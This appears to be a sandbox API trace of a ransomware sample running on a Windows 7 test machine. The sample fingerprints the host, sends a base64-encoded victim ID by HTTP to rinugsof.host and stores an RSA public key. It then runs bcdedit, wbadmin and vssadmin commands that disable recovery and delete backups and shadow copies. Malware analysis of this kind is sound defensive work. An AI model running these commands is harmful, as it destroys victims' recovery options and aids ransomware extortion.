	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1e) returned 0x55ede0
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2a) returned 0x5593c0
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x12) returned 0x55f5a0
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x18) returned 0x55f5c0
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x46) returned 0x554128
	[0023.671] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x55fee0 | out: hHeap=0x540000) returned 1
	[0023.671] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0023.671] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeConditionVariable") returned 0x77168456
	[0023.671] GetProcAddress (hModule=0x76c20000, lpProcName="SleepConditionVariableCS") returned 0x76cb4b32
	[0023.671] GetProcAddress (hModule=0x76c20000, lpProcName="WakeAllConditionVariable") returned 0x7719409d
	[0023.671] RtlInitializeConditionVariable () returned 0xe4e38c
	[0023.671] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0023.671] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="InitOnceExecuteOnce") returned 0x76c4d627
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventExW") returned 0x76cb410b
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreW") returned 0x76c4ca5a
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSemaphoreExW") returned 0x76cb4195
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolTimer") returned 0x76c4ee7e
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolTimer") returned 0x7717441c
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7719c50e
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolTimer") returned 0x7719c381
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWait") returned 0x76c4f088
	[0023.672] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadpoolWait") returned 0x771805d7
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWait") returned 0x7719ca24
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="FlushProcessWriteBuffers") returned 0x77150b8c
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7720fde8
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessorNumber") returned 0x771a1e1d
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="CreateSymbolicLinkW") returned 0x76cacd11
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentPackageId") returned 0x0
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandleEx") returned 0x76c4c78f
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileInformationByHandle") returned 0x76c5cbfc
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeConditionVariable") returned 0x77168456
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="WakeConditionVariable") returned 0x771d7de4
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="WakeAllConditionVariable") returned 0x7719409d
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="SleepConditionVariableCS") returned 0x76cb4b32
	[0023.673] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeSRWLock") returned 0x77168456
	[0023.674] GetProcAddress (hModule=0x76c20000, lpProcName="AcquireSRWLockExclusive") returned 0x771629f1
	[0023.674] GetProcAddress (hModule=0x76c20000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77174892
	[0023.674] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseSRWLockExclusive") returned 0x771629ab
	[0023.674] GetProcAddress (hModule=0x76c20000, lpProcName="SleepConditionVariableSRW") returned 0x76cb4b74
	[0023.674] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThreadpoolWork") returned 0x76c4ee45
	[0023.674] GetProcAddress (hModule=0x76c20000, lpProcName="SubmitThreadpoolWork") returned 0x771a8491
	[0023.674] GetProcAddress (hModule=0x76c20000, lpProcName="CloseThreadpoolWork") returned 0x7719d8e2
	[0023.674] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringEx") returned 0x76cb46b1
	[0023.674] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoEx") returned 0x76cb4751
	[0023.674] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1
	[0023.674] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x800) returned 0x55f5e0
	[0023.674] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0023.674] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xdfdcb7) returned 0x0
	[0023.675] GetCurrentThread () returned 0xfffffffe
	[0023.675] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x1afd04, lpExitTime=0x1afd0c, lpKernelTime=0x1afd0c, lpUserTime=0x1afd0c | out: lpCreationTime=0x1afd04, lpExitTime=0x1afd0c, lpKernelTime=0x1afd0c, lpUserTime=0x1afd0c) returned 1
	[0023.675] RtlInitializeSListHead (in: ListHead=0xe4f338 | out: ListHead=0xe4f338) 
	[0023.675] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x54) returned 0x560230
	[0023.675] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc) returned 0x551700
	[0023.675] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x14) returned 0x560290
	[0023.675] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1afb2c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3.exe")) returned 0x2b
	[0023.675] GetSystemInfo (in: lpSystemInfo=0x1adbfc | out: lpSystemInfo=0x1adbfc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0023.676] GetVolumeInformationW (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1adc24, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1adc24*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0023.676] GetProcessHeap () returned 0x540000
	[0023.676] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x40) returned 0x554d88
	[0023.676] GetProcessHeap () returned 0x540000
	[0023.676] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x40) returned 0x554dd0
	[0023.676] wsprintfW (in: param_1=0x554d88, param_2="%u" | out: param_1="1278171767") returned 10
	[0023.676] wsprintfW (in: param_1=0x554dd0, param_2="%u" | out: param_1="1972518758") returned 10
	[0023.676] lstrcatW (in: lpString1="", lpString2="1278171767" | out: lpString1="1278171767") returned="1278171767"
	[0023.676] lstrcatW (in: lpString1="1278171767", lpString2="1972518758" | out: lpString1="12781717671972518758") returned="12781717671972518758"
	[0023.676] GetProcessHeap () returned 0x540000
	[0023.676] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x554d88 | out: hHeap=0x540000) returned 1
	[0023.676] GetProcessHeap () returned 0x540000
	[0023.676] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x554dd0 | out: hHeap=0x540000) returned 1
	[0023.677] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x1afcc8 | out: phkResult=0x1afcc8*=0x94) returned 0x0
	[0023.677] RegQueryValueExW (in: hKey=0x94, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x1af640, lpcbData=0x1afc9c*=0x200 | out: lpType=0x0, lpData=0x1af640*=0x57, lpcbData=0x1afc9c*=0x2e) returned 0x0
	[0023.677] RegCloseKey (hKey=0x94) returned 0x0
	[0023.677] GetUserNameW (in: lpBuffer=0x1ae43c, pcbBuffer=0x1afca0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1afca0) returned 1
	[0023.682] lstrcpyW (in: lpString1=0x1ae640, lpString2="12781717671972518758" | out: lpString1="12781717671972518758") returned="12781717671972518758"
	[0023.682] lstrcatW (in: lpString1="12781717671972518758", lpString2=";" | out: lpString1="12781717671972518758;") returned="12781717671972518758;"
	[0023.682] lstrcatW (in: lpString1="12781717671972518758;", lpString2="Windows 7 Professional" | out: lpString1="12781717671972518758;Windows 7 Professional") returned="12781717671972518758;Windows 7 Professional"
	[0023.682] lstrcatW (in: lpString1="12781717671972518758;Windows 7 Professional", lpString2=" UserName: " | out: lpString1="12781717671972518758;Windows 7 Professional UserName: ") returned="12781717671972518758;Windows 7 Professional UserName: "
	[0023.682] lstrcatW (in: lpString1="12781717671972518758;Windows 7 Professional UserName: ", lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz") returned="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz"
	[0023.682] lstrcatW (in: lpString1="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz", lpString2=";" | out: lpString1="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;") returned="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;"
	[0023.682] lstrcatW (in: lpString1="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;", lpString2="ex_parvis@aol.com" | out: lpString1="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;ex_parvis@aol.com") returned="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;ex_parvis@aol.com"
	[0023.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;ex_parvis@aol.com", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93
	[0023.682] VirtualAlloc (lpAddress=0x0, dwSize=0x5d, flAllocationType=0x3000, flProtect=0x4) returned 0x70000
	[0023.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;ex_parvis@aol.com", cchWideChar=-1, lpMultiByteStr=0x70000, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="12781717671972518758;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;ex_parvis@aol.com", lpUsedDefaultChar=0x0) returned 93
	[0023.683] CryptBinaryToStringW (in: pbBinary=0x70000, cbBinary=0x5d, dwFlags=0x80000001, pszString=0x0, pcchString=0x1afd1c | out: pszString=0x0, pcchString=0x1afd1c) returned 1
	[0023.683] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x3000, flProtect=0x4) returned 0x80000
	[0023.683] CryptBinaryToStringW (in: pbBinary=0x70000, cbBinary=0x5d, dwFlags=0x80000001, pszString=0x80000, pcchString=0x1afd1c | out: pszString="MTI3ODE3MTc2NzE5NzI1MTg3NTg7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2Vy\nTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7ZXhfcGFydmlzQGFvbC5jb20A\n", pcchString=0x1afd1c) returned 1
	[0023.683] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="12781717671972518758") returned 0x0
	[0023.683] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="12781717671972518758") returned 0xb8
	[0023.683] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x1afd04 | out: phkResult=0x1afd04*=0xc0) returned 0x0
	[0023.684] VirtualAlloc (lpAddress=0x0, dwSize=0x2000, flAllocationType=0x3000, flProtect=0x4) returned 0x90000
	[0023.684] RegQueryValueExW (in: hKey=0xc0, lpValueName="id-rans", lpReserved=0x0, lpType=0x0, lpData=0x90000, lpcbData=0x1afcc0*=0x2000 | out: lpType=0x0, lpData=0x90000, lpcbData=0x1afcc0*=0x2000) returned 0x2
	[0023.684] RegCloseKey (hKey=0xc0) returned 0x0
	[0023.684] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0023.684] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x561d20
	[0023.684] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5610b0
	[0023.685] InternetOpenW (lpszAgent="Random String", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0026.703] InternetConnectW (hInternet=0xcc0004, lpszServerName="rinugsof.host", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
	[0026.706] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x110) returned 0x56e6c8
	[0026.706] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x196) returned 0x56e7e0
	[0026.706] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56e6c8 | out: hHeap=0x540000) returned 1
	[0026.706] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="senior?bs=MTI3ODE3MTc2NzE5NzI1MTg3NTg7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2Vy\nTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7ZXhfcGFydmlzQGFvbC5jb20A\n", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x1adbe8*="text/*", dwFlags=0x80000, dwContext=0x1) returned 0xcc000c
	[0026.710] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1
	[0032.523] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1ad7a0, dwNumberOfBytesToRead=0x3ff, lpdwNumberOfBytesRead=0x1adc10 | out: lpBuffer=0x1ad7a0*, lpdwNumberOfBytesRead=0x1adc10*=0x1c3) returned 1
	[0032.524] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1d0) returned 0x597fc0
	[0032.524] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1ad7a0, dwNumberOfBytesToRead=0x3ff, lpdwNumberOfBytesRead=0x1adc10 | out: lpBuffer=0x1ad7a0*, lpdwNumberOfBytesRead=0x1adc10*=0x0) returned 1
	[0032.524] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x0, lpdwBufferLength=0x1ad788, lpdwIndex=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x1ad788, lpdwIndex=0x0) returned 0
	[0032.524] GetLastError () returned 0x7a
	[0032.524] GetLastError () returned 0x7a
	[0032.524] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1b2) returned 0x5781b0
	[0032.524] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x5781b0, lpdwBufferLength=0x1ad788, lpdwIndex=0x0 | out: lpBuffer=0x5781b0*, lpdwBufferLength=0x1ad788*=0x1b0, lpdwIndex=0x0) returned 1
	[0032.524] OutputDebugStringW (lpOutputString="GET /senior?bs=MTI3ODE3MTc2NzE5NzI1MTg3NTg7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2VyTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7ZXhfcGFydmlzQGFvbC5jb20A HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Random String\r\nHost: rinugsof.host\r\n\r\n") 
	[0032.527] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5781b0 | out: hHeap=0x540000) returned 1
	[0032.527] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0032.527] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0032.527] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56e7e0 | out: hHeap=0x540000) returned 1
	[0032.527] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0032.527] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x390) returned 0x597bb8
	[0032.528] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597fc0 | out: hHeap=0x540000) returned 1
	[0032.528] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5610b0 | out: hHeap=0x540000) returned 1
	[0032.528] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x561d20 | out: hHeap=0x540000) returned 1
	[0032.528] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x1afcf4 | out: phkResult=0x1afcf4*=0x360) returned 0x0
	[0032.528] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr2qF7VErMkClxSdXlhDf\nkgCLCdyVjup+/A3C1/OPXlwmkpff1gjOthYE+C/Q5GC4Jq+ZN1zJLzV6vCisFT1d\nBppd+cDZ/k9Nm9cKgmEggjUgf/RttVlkP42TxOS6IkCsr7L1WlthoJSQpb6OJ4/u\nBqHtQtVHTA5hEmlyCdgQoRQHvsO+dczpiaGDF0RGIMcOR+Qewb7Yv31BsP0Trte/\nQRylwwYH2+GU3iNLaWwYNw8YH9LfCNEW/mj+7R06ewwbxuAAcRZznE1X4Jxnu2vG\ngzhkQpTddQpfLZY9fMjVdH4Ne5uxTLjAIqMDfUMphvZl2jEurkml+MwG7Zw/fUyd\nywIDAQAB\n-----END PUBLIC KEY-----\n") returned 451
	[0032.528] RegSetValueExW (in: hKey=0x360, lpValueName="kakashka", Reserved=0x0, dwType=0x1, lpData="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr2qF7VErMkClxSdXlhDf\nkgCLCdyVjup+/A3C1/OPXlwmkpff1gjOthYE+C/Q5GC4Jq+ZN1zJLzV6vCisFT1d\nBppd+cDZ/k9Nm9cKgmEggjUgf/RttVlkP42TxOS6IkCsr7L1WlthoJSQpb6OJ4/u\nBqHtQtVHTA5hEmlyCdgQoRQHvsO+dczpiaGDF0RGIMcOR+Qewb7Yv31BsP0Trte/\nQRylwwYH2+GU3iNLaWwYNw8YH9LfCNEW/mj+7R06ewwbxuAAcRZznE1X4Jxnu2vG\ngzhkQpTddQpfLZY9fMjVdH4Ne5uxTLjAIqMDfUMphvZl2jEurkml+MwG7Zw/fUyd\nywIDAQAB\n-----END PUBLIC KEY-----\n", cbData=0x386 | out: lpData="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr2qF7VErMkClxSdXlhDf\nkgCLCdyVjup+/A3C1/OPXlwmkpff1gjOthYE+C/Q5GC4Jq+ZN1zJLzV6vCisFT1d\nBppd+cDZ/k9Nm9cKgmEggjUgf/RttVlkP42TxOS6IkCsr7L1WlthoJSQpb6OJ4/u\nBqHtQtVHTA5hEmlyCdgQoRQHvsO+dczpiaGDF0RGIMcOR+Qewb7Yv31BsP0Trte/\nQRylwwYH2+GU3iNLaWwYNw8YH9LfCNEW/mj+7R06ewwbxuAAcRZznE1X4Jxnu2vG\ngzhkQpTddQpfLZY9fMjVdH4Ne5uxTLjAIqMDfUMphvZl2jEurkml+MwG7Zw/fUyd\nywIDAQAB\n-----END PUBLIC KEY-----\n") returned 0x0
	[0032.528] RegCloseKey (hKey=0x360) returned 0x0
	[0032.528] VirtualFree (lpAddress=0x80000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0032.529] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr2qF7VErMkClxSdXlhDf\nkgCLCdyVjup+/A3C1/OPXlwmkpff1gjOthYE+C/Q5GC4Jq+ZN1zJLzV6vCisFT1d\nBppd+cDZ/k9Nm9cKgmEggjUgf/RttVlkP42TxOS6IkCsr7L1WlthoJSQpb6OJ4/u\nBqHtQtVHTA5hEmlyCdgQoRQHvsO+dczpiaGDF0RGIMcOR+Qewb7Yv31BsP0Trte/\nQRylwwYH2+GU3iNLaWwYNw8YH9LfCNEW/mj+7R06ewwbxuAAcRZznE1X4Jxnu2vG\ngzhkQpTddQpfLZY9fMjVdH4Ne5uxTLjAIqMDfUMphvZl2jEurkml+MwG7Zw/fUyd\nywIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x1ad418, pcbBinary=0x1adc1c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1ad418, pcbBinary=0x1adc1c, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0032.530] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x1ad418, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x1adc20, pcbStructInfo=0x1adc18 | out: pvStructInfo=0x1adc20, pcbStructInfo=0x1adc18) returned 1
	[0032.537] CryptAcquireContextW (in: phProv=0xe4a1e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe4a1e0*=0x588a30) returned 1
	[0032.538] CryptImportPublicKeyInfo (in: hCryptProv=0x588a30, dwCertEncodingType=0x1, pInfo=0x5781b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x5781e0*, PublicKey.cbData=0x10e, PublicKey.pbData=0x5781e8*, PublicKey.cUnusedBits=0x0), phKey=0xe4a1d8 | out: phKey=0xe4a1d8*=0x574e60) returned 1
	[0032.540] CryptAcquireContextW (in: phProv=0xe4a1e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe4a1e0*=0x588bc8) returned 1
	[0032.541] CryptImportPublicKeyInfo (in: hCryptProv=0x588bc8, dwCertEncodingType=0x1, pInfo=0x5781b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x5781e0*, PublicKey.cbData=0x10e, PublicKey.pbData=0x5781e8*, PublicKey.cUnusedBits=0x0), phKey=0xe4a1d8 | out: phKey=0xe4a1d8*=0x574ea0) returned 1
	[0032.541] CryptAcquireContextW (in: phProv=0xe4a1dc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xe4a1dc*=0x588c50) returned 1
	[0032.542] LocalFree (hMem=0x5781b0) returned 0x0
	[0032.542] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597bb8 | out: hHeap=0x540000) returned 1
	[0032.542] Wow64DisableWow64FsRedirection (in: OldValue=0x1adc20 | out: OldValue=0x1adc20*=0x0) returned 1
	[0032.542] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1adbcc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1adc10 | out: lpCommandLine="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x1adc10*(hProcess=0x364, hThread=0x360, dwProcessId=0x998, dwThreadId=0x99c)) returned 1
	[0032.555] CloseHandle (hObject=0x364) returned 1
	[0032.555] CloseHandle (hObject=0x360) returned 1
	[0032.556] Wow64DisableWow64FsRedirection (in: OldValue=0x1adc1c | out: OldValue=0x1adc1c*=0x1) returned 1
	[0032.556] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C bcdedit /set {default} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1adbc8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1adc0c | out: lpCommandLine="/C bcdedit /set {default} recoveryenabled no", lpProcessInformation=0x1adc0c*(hProcess=0x364, hThread=0x360, dwProcessId=0x9a0, dwThreadId=0x9a4)) returned 1
	[0032.561] CloseHandle (hObject=0x364) returned 1
	[0032.561] CloseHandle (hObject=0x360) returned 1
	[0032.561] Wow64DisableWow64FsRedirection (in: OldValue=0x1adc18 | out: OldValue=0x1adc18*=0x1) returned 1
	[0032.561] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1adbc4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1adc08 | out: lpCommandLine="/C wbadmin delete catalog -quiet", lpProcessInformation=0x1adc08*(hProcess=0x364, hThread=0x360, dwProcessId=0x9a8, dwThreadId=0x9ac)) returned 1
	[0033.034] CloseHandle (hObject=0x364) returned 1
	[0033.034] CloseHandle (hObject=0x360) returned 1
	[0033.034] Wow64DisableWow64FsRedirection (in: OldValue=0x1adc14 | out: OldValue=0x1adc14*=0x1) returned 1
	[0033.035] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="/C vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1adbc0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1adc04 | out: lpCommandLine="/C vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x1adc04*(hProcess=0x364, hThread=0x360, dwProcessId=0x9b0, dwThreadId=0x9b4)) returned 1
	[0033.042] CloseHandle (hObject=0x364) returned 1
	[0033.042] CloseHandle (hObject=0x360) returned 1
